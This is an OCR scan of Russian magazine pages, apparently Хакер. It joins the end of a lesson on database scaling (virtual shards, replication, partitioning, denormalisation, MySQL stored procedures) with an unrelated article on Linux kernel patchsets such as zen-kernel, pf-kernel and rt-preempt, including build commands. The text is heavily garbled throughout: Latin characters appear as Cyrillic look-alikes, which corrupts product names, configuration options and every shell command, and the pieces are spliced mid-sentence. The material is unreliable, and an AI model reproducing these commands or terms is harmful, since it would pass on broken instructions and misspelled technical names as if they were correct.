некая парадигма с ящиками. Один 
шард — это ящик. Ящик наполнил- 



ся — открыли следующий, ящик 
наполнился — открыли следующий 
Таким образом, мы каждый раз 
добавляем данные в новую и новую 
машину. Потом мы ужедумаем, что 
делатьсостарыми ящиками, кото- 
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рые, можетбыть, даже никогда не используются. Опустошать эти 
ящики, выкидывать, кидать в конец. 

Рассмотрим второй принцип, который нужен в ситуации, когда 
характер нагрузки совсем другой. Допустим, что данные в каждом 
шарде могут расти или, наоборот, не расти по разным законам. 
Классический пример с Марком Цукербергом и Бабу бада на 
РасеЬоок. Если вы храните все о І_асІу бада на компьютере № 69, 
рано или поздно этот компьютер переполнится. 

Нужно думать, что делать со всеми этими данными. Или если 
вместе с І_асІу бада на этом же компьютере хранится десять тысяч 
невинных обычных домохозяек, то рано или поздно хранение 
І_асІу бада на этом шарде приведетктому, что домохозяйки полу- 
чат низкое качество сервисов, поскольку постоянно большой 
профиль нагрузки будету бабу бада. Главная особенность та кого 
сюжета — его непредсказуемость, поэтому нужна достаточно 
гибкая техника — виртуальные шарды. 

ВИРТУАЛЬНЫЕ ШАРДЫ 

Нужно пред разбить пространство данных на заведомо огромное, 
но при этом равномерное по своей наполненности количество 
виртуальных шардов. Скажем, 100 тысяч виртуальных шардов. 

У тебя есть эта цифра, и изначально ты все эти шарды хранишь 
на небольшом количестве машин. Например, ты на каждой ма- 
шине запускаешь 10 Му5С1І_'ей. В каждом МуЗОБ'еты запускаешь 
100 баз данных, а всего у тебя 10, 20, 100 машин. Всё, пред разбие- 
ние выполнено. 

Постепенно вся эта система начинает наполняться, и можно 
достаточно беспроблемно (с помощью репликации] разнести 
данные на отдельные машины, на отдельные базы данных, на от- 
дельные экземпляры серверов и та к да л ее. 

Этатехника называется «виртуальными шардами». Раз- 
биение да иных по шардам — это некая договоренность, как мы 
будем кластьэлементданных и как мы будем его потом искать. 
Универсального решения нет. Это некая договоренность между 
Ьаск-епсГом (бизнес-логикой) и системой хранения. 

Виртуальные шарды — это некая прослойка, которая позволяет 
мне как Ьаск-епсГу общаться всегда с конкретным шардом, неза- 
думываясьотом, гдефизически находится этотвиртуальный шард. 



Виртуальные шарды 




Получается двойной процесс — 
принцип, похожий на схему работы 
виртуальной памяти в компью- 
тере. Нужный шард вычисля- 
ется виртуально (например, по 
пользователю, по какому-то куску 
данных). Затем берется некая 
таблица соответствий, по которой 
выясняется, гдефизически на- 
ходится искомый шард. 



Все это делается для того, 
чтобы в будущем, когда происходит 
росткаждого отдельно взятого 
шарда, мы могли легко и просто, 
незатрагивая ни бизнес-логику, 
ни программную часть, физически 
мигрировать данные с одной маши- 
ны на другую. 

При шард инге, какиприлюбой 
технике децентрализации, все рав- 



НІСНЮАО-ИНСТРУКТОРЫ 



Олег Бунин 



Известный 




специализиру- 
ется на консалтинге, разработке 
и тестировании высоконагружен- 
ных веб- проектов. Сейчас явля- 
ется организатором конференции 
НідЫ_оасІ++ [ ѵѵѵѵѵѵ.ЫаЫоасІ.ги ]. Это 
конференция, посвященная высо- 
ким нагрузкам, которая ежегодно 
собирает лучших в мире специ- 
алистов по разработке крупных 
проектов. Благодаря этой конфе- 
ренции знаком со всеми ведущими 
специалистами мира высоконагру- 
женных систем. 



Константин Осипов 

Специалистпо 
базам данных, 
который долгое 
время работал 
в МуЗСІБ, где 
отвечал как раз 
за высоконагру- 
женный сектор. 
Быстрота МуЗСІБ — в большой 
степени заслуга именно Кости 
Осипова. В свое время он зани- 
мался масштабируемостью МуЗСІБ 
5.5. Сейчас отвечает в МаіІ.Пи за 
кластерную ЫоЗОБ базуданных 
Тагап^ооІ, которая обслуживает 
500-600 тысяч запросов в секунду. 
Использовать этот 0 реп Зои гее 
проект может лю бой желающий. 



МаксимЛапшин 

Решениядля 
организации виде- 
отрансляции, ко- 
шЩ торые существуют 
в мире на данный 
момент, можно 
пересчитать по 
пальцам. Макс 

разработал одно из них — Егіуѵібео 
( егіѵѵісіео.огс 1. Это серверное прило- 
жение, котороезанимается потоко- 
вым видео. При создании подобных 
инструментов возникаетцелая куча 
сложнейших проблем со скоростью. 

У Максима также есть некоторый 
опыт, связанный с масштабировани- 
ем средних сайтов (не таких крупных, 
как МаіІ.Ри). Под средними мы под- 
разумеваем такие сайты, количество 
обращений ккоторым достигает 
около 60 миллионов в сутки. 



Константин Машуков 

Бизнес-аналитик 
в компании Олега 
Бунина. Констан- 
тин пришел из 
мира суперком- 
пьютеров, где 
долгое время «пи- 
лил» различные 
научные приложения, связанные 
с числодробилками. В качестве 
бизнес-аналитика участвует во 
всех консалтинговых проектах 
компании, будь то социальные сети, 
крупные интернет-магазины или 
системы электронных платежей. 
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но должна остаться какая-то центральная сущность, в которой 
хранится информация о том, как была проведена децентрали- 
зация. В нашем случае нужна информация, какой виртуальный 
шард на какой физической машине находится и какой пользова- 
тель к какому виртуальному шарду относится. 

Выбор варианта центрального компонента зависит от сце- 
нария роста, от конкретного приложения. Один из них — иметь 
некий диспетчер шардов, в котором хранится эта информация. 

Второй — просто хранить в конфигурационном файле, если 
эта информация редко меняется. Вы просто распространяете 
этотконфигурационный файл по всемудата-центру, и везде, на 
любом конкретном компьютере у вас есть данные о том, что где 
лежит. 

Третий способ — использование функционального принципа. 
У вас есть функция, которая однозначно выдает вам ответ. Все, 
что вам нужно, — это хеш -функция или некая комбинация хеш- 
функции и таблиц. Но принцип в том, что это функция. Это некие 
минимальные данные, которые редко (практически никогда) 
не обновляются. Вы можете использовать эти знания везде. 

ЦЕНТРАЛЬНЫЙ ДИСПЕТЧЕР 

Есть компания Васіоо (140 миллионов регистраций), сервис 
знакомств. По сведениям последнего года, они используют 
центральный диспетчер. У них нет ни какой функции, которая 
по пользователю вычисляет, где конкретно хранится шард. 

В чем плюсы и минусытакого подхода? 

Центральный диспетчер, при более сложной реализации, 
даетзначительно лучшуюутилизациюжелеза и возможность 
очень быстро обновлять серверный парк. Стоит центральный 
диспетчер и просто сообщает: «Вот тебе еще 10 серверов, зали- 
вай пользователей на них». Ты опять же можешь контролировать 
загрузку и знать, что это у тебя старая слабая машинка, на не 
миллион пользователей, и баста. Вот эта новая, супер — на нее 
10 миллионов пользователей. 

РЕПЛИКАЦИЯ 

Каждый из серверов баз данных может выйти из строя. Надо 
быть кэтому готовым, итутна помощь приходиттехника репли- 
кации. 

Репликация — это средство связи между машинами, между 
серверами баз данных. По большому счету это транспорт. С по- 
мощью репликации можно данные перенести с одной машины 
на другую либо продублировать на двух машинах. Это средство 
организации разбиения. 

На каждую машину можно посылать любой запрос. Все ма- 
шины имеют общую копию данных (синхронная репликация). Эти 
данные с любой машины попадают на любую через некую трубу, 
и эта труба позволяет и меть все эти реплики синхронными. 

Какие тут принципиальные издержки помимо того, что вам 
нужно резатьданные? Каждые данные присутствуютв системе 
в двух-трех экземплярах. Каждая конкретная машина хранит 
то, за что непосредственно она отвечает, плюс она является за- 
пасом, бэкапом для какой-то другой машины. 

Основной принцип использования репликации, который 
чаще встречается, заключается (опять же, как неожиданно!) 
в использовании особенностей запросов к базе данных. Наибо- 
лее вероятный сценарий использования базы данных — редкие 
операции обновления и частые запросы на чтение. Организуется 
простая схема, когда операции обновления идутна центральную 
систему, а оттуда реплицируются (копируются) на несколько 
серверов, которые вы пол ня ют запрос на чтение. 

ПАРТИЦИОНИРОВАНИЕ 

У насестьнесколько подходов, чтобы сделатьтак, чтобы 
смасштабироватьбазуданных. Первое — шардирование, когда 
мы бьем данные по кусочкам, раскладываем их по выбранному 
критерию на машинах. 



Репликация 




Партиционирование 

Функциональное разделение базы данных 

Разные данные хранятся в разных таблицах 

или 

Разные данные хранятся в разных СУБД 

или 

Разные данные хранятся в разных типах СУБД 



Второе — это партиционирова- 
ние. Тоже бьем данные, нонемного 
по другому принципу. Тоже самое, 
что функциональное разбиение бэк- 
ендов. Все, что относится кфоруму, 
лежит в одном месте. То, что отно- 
сится к еще чему-то, лежит в другом 
месте. То, чтоотносится кфоруму, 
лежит в одной базе данных. То, что 
относится кновостям, — вдругой 
базе данных. 

Потом начинаем двигаться еще 
дальше. Мы начинаем использовать 
особенности нашихданных. Мы на- 
чинаем хранить, например, новости 
в реляционной базе данных, а что- 
то еще — в МоЗОЬ'ной базе данных. 

КЛАСТЕРИЗАЦИЯ 

Существует множество коммерче- 
ских и бесплатных кластерных ре- 
шений. Ты покупаешь кластер, его 
настраивают, и далее это решение 
самостоятельно. Все внутренние 
процессы могутбытьтебе даже 



неизвестны. Это хорошо, с одной 
стороны — за тебя все настроили 
профессионалы. С другой стороны, 
это плохо — утебя нетвозможно- 
сти что-либо исправить в случае 
ошибки. Ты просто незнаешь, как 
эта штука работает. 

Все то же самое можно реали- 
зовать с помощью репликационной 
модели, когдаты просто-напросто 
соединяешь базы да иных в некую 
структуру. Данные в них движутся, 
существуюткопии. Конкретные 
процессы репликации и шардинга 
в данном случае спрятаны — по- 
этому отстрелитьлишние не полу- 
чится. 

ДЕНОРМАЛИЗАЦИЯ 

Рассмотрим еще один инстру- 
мент — денормализацию. Иногда 
для повышения эффективности 
хранения приходится размещать 
данные не самым оптимальным 
образом, то есть денорма л изовать. 
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Учебник по высоким нагрузкам. Урок № 5 



Например, можно их дублировать, можно хранить их в разных 
форматах. В примере с очередью модерации, как вы помните, мы 
хранили их в основной базе данных и отправляли еще куда-то. 
Система хранения, схема хранения, инструменты хранения отра- 
жают характер данных и предполагаемую модель их использова- 
ния. Это происходит и мен но для того, чтобы ускорить обработку, 
ускорить построение страницы. 

Хороший примертого, какданные не денормализуются, хотя 
надо было бы, — это френдлента в «Живом журнале». Отсюда (во 
всяком случае, несколько лет назад) все их проблемы: низкая 
скорость работы и ограничение на количество френдов у одного 
пользователя. Дело втом, что каждый раз френдлента строится 
нормальным, честным ЗОБ-за просом: «Дай мне все сообщения 
всех моих друзей, отсортируй». 

В РасеЬоокэто не так. Там каждое сообщение может храниться 
в нескольких миллионах экземпляров — именно для того, чтобы 
обработка данных происходила быстрее, чтобы быстрее показать 
пользователю пеѵѵз^еесБ 

Это и есть денормализация данных. Ничего страшного, что 
данные хранятся в двух-трех экземплярах. У этого есть, раз- 
умеется, оборотная сторона: нужнознатьобэтом, уничтожать 
или каким-то образом обрабатывать правильно. Но это позволит 
ускорить построение страниц. 

Чтобы осуществитьденормализацию данных, придется не- 
много поломать существующую модель представления данных, 
а это усложнит ее а на л из. Для этого есть огромное количество 
решений, которые хранят да иные в денорма л изованн ом виде, 
но могут представлять их в реляционном виде. 

ОСОБЕННОСТИ ХРАНИМЫХ ПРОЦЕДУР В МУБОЬ 

Поговорим о достоинствах и недостатках хранимых процедур 
в МуЗСІБ. Напомним, что использовать этот инструмент в масшта- 
бируемой базе данных надо очень аккуратно. 

Хранимая процедура — это текст, записанный в системную 
таблицу, который будетрегулярно читаться изтаблицы, компи- 
лироваться и кешироваться в скомпилированном виде в каждом 
соединении ксерверу. Поскольку на каждый скомпилированный 
объект требуется от 80 Кб оперативной памяти, при исполь- 
зовании большого количества хранимых процедур в большом 
количестве соединений ксерверу надо рассчитывать на рост 
оперативной памяти, необходимой для Му5С1І_. Кпримеру, при 
1000 активных соединений каждое соединение использует 20 
хранимых процедур по 100 Кб, необходимо до 2 Гб дополнительно 
оперативной памяти для хранимых процедур. 

Несмотря на этот недостаток, использование хранимых 
процедурявляется распространенной практикой при доступе 
к да иным в крупных веб- проектах по следующим причинам: 

• дополнительный уровень внутренней безопасности. Приклад- 
ной программист, разрабатывающий сервиссети, вызывает 
хранимую процедуру, а не ЗОБ-за п рос, и таким образом не 
имеет прав и может не знать непосредственной схемы данных; 

• возможности изменения схемы данных без изменения при- 
ложений. Меняется только уровень хранимых процедур. 

Производительность процедуры на прямую за висит от ее 
сложности. Распространенная практика — созданиехранимых 
процедур, инкапсулирующих не более 1-2 запросов к БД. Исполь- 
зование более сложных процедур не распространено, так как: 

• пропорционально увеличивается задержка на выполнение 
процедуры; 

• отладка в случае неполадок усложняется, поскольку в МуЗОБ 
нет интегрированного отладчика хранимых процедур, не 
говоря уже о том, что в ргосіис^іоп может быть еще важно по- 
нять, какой конкретно запрос в хранимой процедуре начинает 
выполняться медленно, и наличие большой процедуры до- 
бавляет сложности в поиске проблемы. 




Важноучитыватьто, что при 
изменении хранимой процедуры 
одновременно и нва ли дируются все 
кеши всехактивныхсоединений. 
Это можетпривести ксерьезным 
«провалам» в производительности, 
так как все соединения одновре- 
менно будутпытаться пересоздать 
свои скомпилированные копии 
хранимых процедур. Это следует 
учитыватьи не планировать масси- 
рованные изменения в прайм-тайм 
нагрузок. 

При репликации хранимых 
процедур МуЗОБ использует 
такназываемый ипгоіііпд, то 
есть в геріісабоп Іод попада- 
ет не непосредственно вызов 
хранимой процедуры (САББ 
СеШ5егСотеД480145)), а запросы, 
выполненные внутри хранимой 
процедуры. То есть реплика вы- 
полняет не саму процедуру, а только 
тезапросы, которыехранимая 
процедура используети которые 
изменяютданные. 

Необходимотакже иметь в виду, 
что алгоритм выполнения хранимых 
функций и триггеров в МуЗОБ суще- 
ственно отличается от описанного 



выше, то есть не следует эти знания 
при менять для хранимых функций 
итриггеров. 

ПОСЛЕДНИЙ ПУНКТ 
ОБЯЗАТЕЛЬНОЙ ПРОГРАММЫ 

Вот, наверное, и все основы 
масштабирования баз данных. 
Используйте все приемы разумно, 
втой мере, в какой необходимо. 

Почему базы данных — это «по- 
следний пункт», спросишьты? Все 
очень просто — в предыдущих пяти 
урокахмы рассмотрели основные 
архитектурные модулитипично- 
го высоконагруженного проекта 
фронтенд, бэкенд, базуданных. Для 
каждого мы перечислили типичные 
подходы кмасштабированию. Ты 
можешь уже приступить к созданию 
своего собственного высоконагру- 
женного проекта. 

Но разработать проект — это 
еще не все. Проект надо поддер- 
живать, эксплуатировать, надо 
организовать правильный хостинг, 
правильный мониторинг. Вотоб 
этих, сервисных, но совсем не 
маловажных аспектах пойдет речь в 
последнем уроке. До встречи! нс 
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Считается, что стандартное ядро І_іпих подхо- 
дит абсолютному большинству пользователей, 
однако «большинство» не значит «все». Если 
ты смелый экспериментатор и хочешь попро- 
бовать возможности, которых нет в стандарт- 
ном ядре, эта статья для тебя. 



ПАТЧСЕТЫ: ВЗГЛЯД СВЕРХУ 



Для начала, как мне кажется, стоит задаться вопросом, для чего 
вообще нужны патчсеты? По названию понятно, что патчсеты — 
наборы заплаток. Заплатки эти — самого разного назначения. 
Ктаковым, например, можно отнести увеличение произво- 
дительности как системы, так и какого-нибудь оборудования 
(550-накопители). Еще одна цель — добавление интересных фич, 



которые по тем или иным причинам не включены в стандартное 
ядро, например ФС Реізег4. 

Ты наверняка спросишь: почему, если эти патчсеты так круты, их 
нет в основном коде ядра? Ответ на этот вопрос в общем случае зву- 
читтак: «Политика!» Для примера возьмем относительно недавнее 
объединение кода Андроид со стоковым ядром. Долгое время из-за 
того, что код Андроида не соответствовал правилам оформления 
кода ядра и (о ужас!) балансировал на грани нарушения 6РІ_, он 
находился в отдельной ветке. Но после того, как Гуглу предложили 
убрать его и из этой ветки, код волшебным образом привели в поря- 
док. Кроме того, не стоит забывать, что некоторые патчи поддержи- 
ваются отдельными людьми. И хорошо, если они будут их поддер- 
живать после добавления в код ядра, — а если нет? Мало ли какие 
проблемы могут у человека возникнуть. Кто тогда будет следить за 
тем, чтобы патч не конфликтовал с остальным кодом ядра? 

В данной статье я рассмотрю такие патчсеты общего назна- 
чения, как 2еп кегпеі (кратко затронув построенный на его базе 
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Храбрый портной 




Сравнение планировщиков ВРБ и СРВ (2009) 
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Патч 2еп кегпеі в Ѵіт. Видно начало функции аиТ5_іпіІ() 



патчсет Пциопх), р^-кегпеі, патч поддержки реального времени 
О-ргеетрС а на десерт оставлю патч дгзесигііу — который, как яв- 
ствует из названия, имеет отношение к безопасности. 

Для патчей, относящихся к производительности, я провел 
несколько тестов — один синтетический (ІІпіхВепсЫ и несколь- 
ко на основе реальных программ, таких как ЗоЬп 1Ье Ріррег, 62ір 
и МРІауег. В статье будут приведены исключительно результаты 
бенчмарков, поскольку, на мой взгляд, интерпретацией должен 
заниматься сам читатель. 



1ЕЫ КЕКЫЕЬИ ШІЮШХ 



Патчсет 1е п кегпеі ( геп-кегпеі.огд ) предназначен в основном для 
десктопных систем. Пожалуй, самый большой из рассматриваемых. 
Что же в нем такого? А вот что (предупреждаю, что дальше буду 
описывать только показавшиеся мне интересными возможности): 

• 2еп-5сГіесІ — под этим названием скрывается несколько плани- 
ровщиков, таких, например, как ВР5 от Кона Коливаса (о нем я 
чуть более подробно расскажу в разделе по патчсету р^-кегпеі) 
и стандартный нынче СРВ с некоторыми улучшениями для 
десктопа, к каковым относится опция Воозі — автоматический 
ренайсинг высокоприоритетных задач до заданной величины. 

• БРО — опять же планировщик, но на сей раз ввода/вывода. 
Основан на принципе выделения бюджета (секторов, а не денег, 
конечно) каждому приложению — в зависимости от его поведе- 
ния бюджет может увеличиваться или уменьшаться. Кроме того, 
сколько бы ни было запросов к диску, планировщик «делает 
вид», что диск бездействует. 

• АІІР52 — интересная «файловая система», поддерживающая 
«спайку» нескольких подмонтированных файловых систем 

в одну. Почему в кавычках — это не ФС в обычном понимании 
этого слова, то есть метаданных у нее нет. Покажу, как это рабо- 
тает, на наглядном примере. 

Допустим, у меня есть два подмонтированных раздела: один 
на новом диске, пусть будет /тесііа/пеѵѵ, другой — /тесІіа/ОАТА, 
локальный раздел данных. Для «спайки» выполняю следующую 
команду: 

$ біісіо тоштЕ -1: аи-Рз -о \ 

Ьг : /тесІіа/пеы=пл/ :/тесІіа/ОАТА=гЫд \ 
сгеа1:е=т-р5 л зит попе /тесііа/ипіоп 

Что делает эта команда? Она объединяет файловые системы 
/тесііа/пеѵѵ и /тесІіа/ОАТА в одну — /тесііа/ипіоп, при этом пара- 
метр сгеаІе=т{5 говорит о том, что файлы будут писаться туда, где 



больше свободного места, а вит — что в утилитах сК или би будет 
отображаться суммарный размер как разделов, так и свободного 
места на них. 

• Ыпих-РНС — патч для снижения энергопотребления процес- 
сора. Как пишут разработчики, патч работает аналогично про- 
граммам ЫНС и РідЫтагк РМСІоск для ѴѴіпбоѵѵв. Патч рекомен- 
дуется владельцам лаптопов — увеличивает время работы от 
аккумулятора. 

• РеівегА — файловая система от печально известно- 
го Ганса Рейзера. Преимущества ее таковы: алгоритм 
бапсіпд Ігее, который ускоряет работу с ФС путем отказа 
от постоянной балансировки дерева, и платинная модель, 
позволяющая добавлять новые возможности к ФС без 
форматирования. 

• 5ЮВ — аллокатор памяти. По словам разработчиков, он более 
быстр, чем 5І_АВ и 5ШВ. Подробности попахивают «черной 
магией», но если кратко, то он имеет улучшенный алгоритм 
дефрагментации страниц. 

• РаІЕІ_Р — формат исполняемого файла (базируется, как это 
понятно из названия, на обычном ЕІ_Р), позволяющий в один 
бинарни к запихнуть программу для нескольких платформ. По- 
добная фича есть и в Мае 05 X — называется ипіѵегзаі Ьіпагу. 

• ІЬсопсІесог — забавный патч, включающий поддержку фоново- 
го рисунка... да-да, в консоли! Не совсем понятно, правда, кому 
и зачем это нужно. 

Рассмотрим установку и компиляцию 2еп кегпеі под ІІЬипІи 
12.04 на ванильное ядро 3.3, хотя не думаю, что с другими ядрами 
могут возникнуть какие-то проблемы. Далее предполагается, что у 
тебя установлены соответствующие инструменты. Скачиваем ядро 
и распаковываем его: 

$ іл/^еі: ІтЕ'Ер: //млм. кегпеі. ог^/риЬ/1іпих/кегпе1\ 

/ѵ3.х/1іпих-3.3.1:ап.§2 && 1:аг хгѵ-р Л 

Ііпих-3. 3.1:аг.§2 

В скобках замечу, что требуется именно ядро 3.3 без каких-либо 
стабилизирующих патчей. 

Если ты хочешь попробовать собрать несколько ядер, то, оче- 
видно, необходимо создать репозиторий діі: 

$ ссі Ііпих-3.3 
$ ?І 1= іпіі 
$ §І1: асісі . 

$ ВІ~Е соттіі: -т "Іпііііаі соттгЬ" 
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Патчсет р^-кегпеі — выбор І/О-шедулера 

Еще не лишним было бы создать бранч и переключиться на него: 

$ 1 *гЬ сііескоиі: -Ь геп-кегпеі 

Атеперь качаем самый свежий снапшот патча для ядра 3.3, 
проверяем: 

$ м^еі: Іі1:1:р://сІоѵ\/п1с>асІ5. геп-кегпеі. ог^/зпарзІіоІізХ 
/ѵЗ . 3_та Бііег .^І-Р-Р . §2 

$ гсаі: ѵЗ.ЗтазІіег.сІі-р-Р .%2 | раІісРі -рі --сігѵ-гип 

и, если все нормально, повторяем последнюю команду без ключа 
'--ску-гип'. Также не забываем закоммитить изменения: 

$ ?І1= асИ . -А 

$ §гЕ сотшіі: -т "Іпііііаі соттіі: іп Ьгапсб геп-кегпеі" 

Теперь копируем файл текущей конфигурации ядра (чтобы не 
мучиться, выбирая нужные и ненужные опции) и запускаем таке 
теписопЛд: 

$ ср /Ьоо1:/сопб%- ' ипате -г' . /,сопб§ 

$ таке теписопб§ 

Прежде всего отключи опцию сопРіди ге зіапсіагсі кегпеі (еаіигез 
(ехрегі изегз) в (ЗепегаІ 5еІир и кегпеі беЬиддіпд в кегпеі Ріаскіпд — 
без этого компиляция вылетит с ошибкой. Затем снова в СепегаІ 
5еІир нужно убедиться, что включен планировщик ВР5, и посмо- 
треть профиль 2еп-Типе. Аллокатора 5ЮВ уже нет. Смотрим АІІР5. 
Запрятана она в «Рііе зузіетз — > Мізс. Рііезузіетз». По умолча- 
нию там все нормально (вряд ли тебе понадобится монтировать 
более 127 деревьев). Разве что если ты вдруг захочешь включить 
Шсопбесог, то сперва надо отключить Тііе ВІіШпд, а перед этим 



еще и некоторые драйверы поотключать — ибо они от него зависят. 
К таковым относятся: РВ_53 — поддержка фреймбуфера для виде- 
окарт 53, РВ ѴТ8623 — для видеокарт ѴІА и РВ_АРКдля видеокарт 
никому не известной АРК І_одіс. Вот вроде и все. Компилируем с 
С01\1С11РЕ1\1СУ_1_Е\/Е1_=п, где п — число ядер твоего процессора, 
устанавливаем, используя ссасЬе, получившиеся пакеты и переза- 
гружаемся (в твоем случае названия пакетов будут другими): 

$ СС="ссасІіе ^сс" СХХ="ссас1іе е++" СОІМСІЖЕІМСУ І_ЕѴЕІ.=2 \ 
-Ракегооі: таке-крк% - - іпііігсі --аррепсІ-1:о-ѵег5Іоп= \ 

-ту кегпе1_іта§е кете1_1іеабег5 

$ зисіо брк§ -і . ./1іпих-іта§е-3.3.8-2еп \ 

-ту + _3.3.8-2еп-ту+-1Ѳ.ѲѲ.Си5І:от_і386.беЬ \ 

. ./1іпих-1іеабеп5-3.3.8-2еп-ту+ 3.3.8-2еп-ту+-10.00. \ 
Си5І=от_і386.беЬ 



Стоиттакже дать краткое описание ядра Іщііопх. По сути, 
это обычное ядро с патчсетом 2еп, только оптимизированное 
для достижения максимальной производительности и отзывчиво- 
сти рабочих станций, мультимедиасистем и игровых ПК. За исклю- 
чением МакеПІе патчсет ничем не отличается от 2еп кегпеі, поэтому 
я его рассматриваю лишь постольку-поскольку. 



РЕ-КЕРИЕ!. 



Сразу хочу сказать, что буквы «рЬ> не означают «Раскеі ПІІег», 

как ты, вероятно, подумал. Это сокращение ника автора патчсета — 

«розЫасІит». Собственно же патчсет включает в себя следующее: 

• Патчсет -скот Кона Коливаса, особенно выделю из него пла- 
нировщик В Р5. Он основан на принципе ЕЕѴйР: самый ранний 
дедлайн — первым. В отличие от СР5, этот п лани ров щи к пред- 
назначен только для обыч ных десктоп ных систем и не очень-то 
масштабируем для систем, у которыхбольше Ібядер. Еслитебе 
интересен принцип его работы, смотри ЬіСІѵ/ІббНН — там описа- 
но, какэтотпланировщикдействует. 

• ВРО — о нем я уже писал выше, повторяться не буду. 

• ТихОпІсе — собственно, он должен бытьи в предыдущем патч 
сете, но, во-первых, его втой версии, которуюя компилировал, 
нет (впрочем, каки некоторых других описан ных мной патчей — 
видимо, убрали), а во-вторых — надо же что-нибудь оставить 

и для этого патчсета? Ноя отвлекся. Итак, ТихОпІсе — поддержка 
гибернации в Ыпих. Изфич — сжатие образа, шифрование, кон- 
фигурирование без перезагрузки и режим сохранения образа — 
что полезно, допустим, для компьютерного класса, когда надо 
откатиться до чистой системы. 

• ІМО — патч для шейпинга входящеготрафика, включаетдрайвер 
псевдоустройства. Какизвестно, прямой входящий трафик шей- 
пить затруднительно, более-менее нормально шейпится только 
исходящий. Что делает ІМО? Он создает псевдоинтерфейс, на ко- 
торый можно перенаправить входящий трафик и, грубо говоря, 
сделать его исходящим — а там уже его можно и шей пить. 

• 17-ПКег — позволяет ІЧеШКег смотреть за головки пакетов 
уровня приложений. Патч нужен в основном для работы с Р2Р- 



ПАТЧ ДЛЯ ОПТИМИЗАЦИИ ПОД НЕТБУКИ 



кегпеІ-пеіЬоок ( ЫЦу/пМиЗА) — неофициальный набор патчей к Ыпих-ядру, 
направленный на улучшение поддержки таких нетбуков, как Азиз Еее РС, Асег 
Азріге Опе, М5І ѴѴіпб, Батгигід ІЧ-серия, йеІІ Міпі. Ядро содержит нацеленные 
на уменьшение размера и увеличение скорости загрузки оптимизации, 
включает в себя дополнительные драйверы устройств (Ьгоабсот-ѵѵІ, зікііхх) 
и прошивки (Ягтѵѵаге). В состав также входит стандартный набор патчей 
к ядру из АгсЬ Ыпих. 
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трафиком — Бкуре, Тоггепі, ейопкеу, Кагаа. На современных 

ядрах, по-видимому, неработает, и всвежихверсияхегонет. 

Из состава патчсета для ядра 3.5 — на момент написания статьи 
эта версия была последней — убраны некоторые патчи, но взамен 
добавлен патч ІІК5М (ІІИга КегпеІ Батераде Мегдіпд) от китайской 
команды КегпеЮесІир ( кегпеИебир.ога ). Технология ІІК5М выис- 
кивает одинаковые страницы в памяти и объединяет их, в резуль- 
тате на десктопе потребляемая память сокращается на 50-100 Мб, 
а при запуске десяти одинаковых виртуалок они будут потреблять 
оперативную память, как одна (в идеале конечно). 

Установка р(, без учета команд діі, достаточно тривиальна: 

$ ы^еі: Іі1=1=р://р-Р.па1=а1епко.пате/5оигсе5/3.3/ \ 
раІісИ - 3 . 3 . 6-р-р. Ьг2 

$ Ьгсаі: ра1:сІі-З.З.б-рТ.Ь22 | раіісіі -рі 

В появившемся после применения патчсета каталоге сопіідз 
есть конфиги для ноутов А51І5 6735ѴѴ, йеІІ Іпзрігоп 1525 и Батзипд 
ІМР900ХЗА. У меня этого железа не оказалось, поэтому я снова ис- 
пользовал старый конфиг. Заходим в теписопЯд. 

$ таке теушсогѵб§ 

Первым делом включаем ВРО в «ЕпаЫе 1Ье Ыоск Іауег — ► ІО 
БсЬесІиІегз». Там же можешь включить иерархическое планирова- 
ние, если ты его используешь. Затем включаем его по умолчанию: 
уровнем выше — > Оеіаиіі 1/0 БсЬесІііІег. Теперь смотрим ТихОпІсе. 
Идем в «Роѵѵег тападетепі — > ЕпЬапсесІ НіЬегпаІіоп». В любом 
случае управление питанием в І_іпих — вопрос отдельный, и его 
рассмотрение выходит за рамки данной статьи. Единственное, что 
я бы посоветовал, — включить СЬескзшт радезе12 — проверку 
контрольных сумм страниц. Если ты хочешь попробовать 17-ЛІІег, 
иди в «ІМеІѵѵогкіпд зиррогі — > ІМеІѵѵогкіпд орііопз — > ІМеИіІІег — > Соге 
ІМеИіІІег Сопіідигаііоп». Компиляция тоже тривиальна, так что ее 
рассматривать не буду. 



КТ-РКЕЕМРТ 



На сей раз «гі» означает именно то, что ты подумал, — 
геаіііте. Этот патчсет предназначен, понятно, для поддержки 
реального времени в ядре, причем не «мягкого», а «жестко- 
го». В чем разница? Системы «мягкого» реального времени 
допускают небольшое превышение желаемого времени вы- 
полнения, в системах же «жесткого» подобное превышение 
недопустимо. Патчсет гі-ргеетрі превращает ядро Ыпих в 
полностью преемптивное. Перечислю способы, которые для 
этого применяются: 

• Вместо обычных мьютексов в спин-блокировках используются 
мьютексы реального времени. 

• Критическиесекции, которыезащищены соответствующими 
блокировками, преемптивны, впрочем, создание непреемптив- 
ных секций тоже возможно. 
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ДРУГИЕ ИНТЕРЕСНЫЕ ПАТЧИ 



• КегпеІ Мосіе Ыпих ( ьіі.Іу/ѵѵТ04МЗ) — позволяет выполнять 
программы пользователя в режиме ядра. Соответственно, они 
будут иметь доступ к адресному пространству ядра и работать без 
переключений контекста. 

• |_Ю5 (ЫЫу/90гЗт<) — еще один патч мандатного контроля доступа. 

• ВасіРАМ ( Ьіі.Іѵ/біагпо ) — патч для работы с битой памятью. 

• МОБІХ ( ЫЫу/РсІМ4ед ) — поддержка распределенных вычислений 
(кластеры, облака...). 

• СРЦ5ЕТ5 (ѵѵѵѵѵѵ.ЬиІІорепзоигсе.ога/сриБеП — патч для ядра 2.6, 
обеспечивающий привязку приложения к определенному СРІІ 
(или группе процессоров) в БМР-системе. 

Из не поддерживаемых ныне патчей стоит отметить: 

• ОМЕТ, ОоБ апсі ЫеШКег ра1сІі5е1 для Ыпих 2.6.x 

( ѵѵѵѵѵѵ.ореппе1.ги/ргод/іпіо/2339.5Н1ті ). 

• Ыпих кегпеі раісіі от проекта ОрепѵѵаІІ 

( ѵѵѵѵѵѵ.орепѵѵаІІ.сот/Ііпих/КЕАРМЕ.зИіті ). 

Еще одна подборка патчей лежит здесь: . Большинство 

из них, к сожалению, уже не поддерживается, но — интересно. 



• Наследование приоритетов для внутриядерных спин- 
блокировок и семафоров. 

• Преобразование обработчиков прерываний в преем птивные по- 
токи ядра. Ядро обрабатывает зоНігц -обработчики как обычные 
пользовательские процессы. Впрочем (видимо, из соображений 
совместимости), регистрация обработчиков в контекстеядра 
по-прежнему доступ на. 

На момент написания статьи патчсет для ядер третьей ветки 
доступен только для версий 3.0, 3.2 и 3.4. Установка его обычна 
(команды діі опускаю): 

$ ы§е1 ІтЕІір: //млм. кегпеі. ог§/риЬ/1іпих/кегпе1\ 

